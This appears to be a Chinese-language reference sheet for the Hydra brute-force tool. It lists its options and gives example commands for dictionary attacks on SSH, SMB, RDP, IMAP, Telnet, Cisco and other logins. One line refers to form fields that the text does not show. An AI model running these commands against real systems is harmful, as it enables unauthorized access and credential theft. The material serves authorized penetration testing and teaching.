Hydra

Hydra是一款很强大的暴力破解工具，由著名的黑客组织THC开发的一款开源暴力破解工具。Hydra是一个验证性质的工具，主要目的是：展示安全研究人员从远程获取一个系统认证权限。

常见参数

-R：继续从上一次进度接着破解
-S：大写，采用SSL链接
-s  <PORT>：小写，可通过这个参数指定非默认端口
-l  <LOGIN>：指定破解的用户，对特定用户破解
-L  <FILE>：指定用户名字典
-p  <PASS>：小写，指定密码破解，少用，一般是采用密码字典
-P  <FILE>：大写，指定密码字典
-e  <ns>：可选选项，n：空密码试探，s：使用指定用户和密码试探
-C  <FILE>：使用冒号分割格式，例如“登录名:密码”来代替 -L/-P 参数
-M  <FILE>：指定目标列表文件一行一条
-o  <FILE>：指定结果输出文件
-f ：在使用-M参数以后，找到第一对登录名或者密码的时候中止破解
-t <TASKS>：同时运行的线程数，默认为16
-w <TIME>：设置最大超时的时间，单位秒，默认是30s
-v / -V：显示详细过程
server：目标ip
service：指定服务名，支持的服务和协议：telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等
OPT：可选项

命令示例

hydra -L user.txt -P passwd.txt -o ssh.txt -vV -t 5 10.96.10.252 ssh   #-L指定用户字典 -P 指定密码字典  -o把成功的输出到ssh.txt文件 -vV显示详细信息

后面参数是网页中对应的表单字段的name 属性，后面<title>中的内容是表示错误猜解的返回信息提示，可以自定义。

破解https：

• hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

破解teamspeak：

• hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

破解cisco：

• hydra -P pass.txt 10.36.16.18 cisco
• hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

破解smb：

• hydra -l administrator -P pass.txt 10.36.16.18 smb

破解pop3：

• hydra -l muts -P pass.txt my.pop3.mail pop3

破解rdp：

• hydra ip rdp -l administrator -P pass.txt -V

破解http-proxy：

• hydra -l admin -P pass.txt http-proxy://10.36.16.18

破解imap：

• hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
• hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

破解telnet

• hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V